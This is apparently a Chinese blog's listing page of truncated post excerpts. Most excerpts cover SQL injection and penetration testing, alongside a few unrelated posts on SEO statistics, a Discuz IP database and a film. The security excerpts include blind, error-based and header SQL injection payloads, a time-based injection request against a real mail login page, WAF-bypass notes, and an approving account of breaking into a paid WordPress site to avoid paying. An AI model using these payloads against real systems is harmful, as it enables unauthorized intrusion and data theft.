密码保护:某行业关键词3个月百度排第一数据分析

密码保护:某行业关键词3个月百度排第一数据分析
【第一点】:访客数(UV)、IP数相同。 【第二点】:IP数、访问次数相同。 【第三点】:ip与PV的对比 ip与PV的对比 【第三点】:新访客数与新访客比率 新访客数与新访客比率 【第三点】:平均访问时长与平均访问页数 平均访问时长与平均访问页数 【第四点】:ip数与新访客比率 ip数与新访客比率 【第五点】:ip数与平均访问页数 ip数与平均访问页数 【第六点】:ip与平均访问...

Discuz! X3 使用tinyipdata.dat纯真IP库最新版,2016年3月数据

Discuz! X3 使用tinyipdata.dat纯真IP库最新版,2016年3月数据
DX默认使用的IP库只有1M,运行时占用资源少,但很多ip不准确,更新也慢,默认存放的路径在data/ipdata/tinyipdata.dat 今天给转成纯真ip库,过程很简单 step 1,下载纯真ip库软件并安装,安装完成以后在安装目录找到qqwry.dat step 2,如果论坛是gbk编码,可以直接进入 step 3,如果是其它编码,需要将gbk编码转换成论坛对应的编码 下载附件以后,使用IpLook,将qqwry.dat转...

《线人》———男人

《线人》———男人
《线人》是一部电影,谢霆锋主演。曾经看过这个电影,今天电视又播放了,顺带就又看了一遍,这次看的感触略微有些深。为什么标题有男人,因为从这个电影看到了男人应该有的一面,那就是为了家人,可以舍弃一切,只因为两个字那就是担当。 男人!男人就应该顶天立地,这才是男人。为了家人,为了家庭,现在的男人比以前的男人担子更重。 男人你别怕苦,男人你别怕累,既然你...

记一次渗透过程(wpscan+LuManage(sql注入)+memcached未经授权访问)

记一次渗透过程(wpscan+LuManage(sql注入)+memcached未经授权访问)
文章来源土司:https://www.t00ls.net/thread-33339-1-1.html 文章作者:lalala 网站是一个wordpress的福利站,需要充值vip才可以看内容,无奈我这种屌丝肯定不会花钱去买。于是就对网站下手了。先展示一下网站首页。 目标地址 WordPress的站,首先想到的便是wpscan扫 wpscan扫描 爆出了网站的robots.txt,网站路径,和wp4.3.3版本。除了这些,wpcan并没有爆出太多有用的东西...

SQL Injections in MySQL LIMIT clause

SQL Injections in MySQL LIMIT clause
此方法适用于MySQL 5.x中,在limit语句后面的注入 例如: SELECT field FROM table WHERE id > 0 ORDER BY id LIMIT injection_point 上面的语句包含了ORDER BY,MySQL当中UNION语句不能在ORDER BY的后面,否则利用UNION很容易就可以读取数据了,看看在MySQL 5中的SELECT语法: SELECT [ALL | DISTINCT | DISTINCTROW ] [HIGH_PRIORITY] [STRAIGHT_JOIN] [SQL_SMALL_RESU...

密码保护:WooYun→lijiejie→漏洞利用方式总结(入侵技术总结)

密码保护:WooYun→lijiejie→漏洞利用方式总结(入侵技术总结)
一、首先是一个JD的漏洞。如下 1 2 3 POST https://mail.jd.com/Erpout/Logon.aspx //页面源码为UTF-8   captcha=test&destination=https://mail.jd.com/owa/&flags=0&forcedownlevel=0&isflag=0&isUtf8=1&maindo=mail.jd.com&showCheck=0&trusted=4&txtPassword=test&txtUser=aaaa'XOR(if(ascii(mid(user(),1,1))=106%2cben...

mysql注入常用函数意义意思讲解

mysql注入常用函数意义意思讲解
常用注入语句: if(left(db_name(),1)='d')waitfor/**/dalay/**/'0:0:2'/**/-- or if(length(database())-8,benchmark(4000000,sha1(1)),1) (select(0)from(select(sleep(2)))v) Client-IP: * 注射,。 X-FORWARDED-FOR: * 注射,。 //介绍几个常用函数,都是MYSQL 查询中的使用意义: 1. version()——MySQL版本 2. user()——用户名 3. database()——数据库名 4. @@datadir——...

windows10 所有exe文件无法打开 鼠标右键没有”打开”

windows10 所有exe文件无法打开 鼠标右键没有”打开”
今天在更改某个exe软件标题,我得先啰嗦一下,就是大概我在更改一个软件,主要是为了让软件在运行的时候变名称,例如原来是qq.exe我想让它在进程中改名,变为asdf.exe,结果刚弄完,弄成功了,然后所有的exe文件没有打开选项。所有的exe文件无法打开,用鼠标右键点击exe文件的时候,居然没有“打开”选项。。。 我换个用户就有“打开”选项,基本可以证明是注册表的事了。那么,...

MYSQL高级报错注入脚本安全

MYSQL高级报错注入脚本安全
 MYSQL高级报错注入     and (select count(*) from mysql.user)>0/*     1、查看MYSQL版本     and+exists(select*from+(select*from(select+name_const(@@version,0))a+join(select+name_const(@@version,0))b)c)     2、爆所有库     and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,schema_name,0x27,0x7e) FROM infor...

深入了解SQL注入绕过waf和过滤机制

深入了解SQL注入绕过waf和过滤机制
知己知彼百战不殆 --孙子兵法 [目录] 0x00 前言 0x01 WAF的常见特征 0x02 绕过WAF的方法 0x03 SQLi Filter的实现及Evasion 0x04 延伸及测试向量示例 0x05 本文小结 0x06 参考资料 0x00 前言 笔者前几天在做测试时输入攻击向量后页面发生了重定向甚至异常输入也是重定向怀疑其中有WAF在作怪。之前对WAF接触比较少纯粹是新手趁此科普了 一下并查阅了一些绕过W...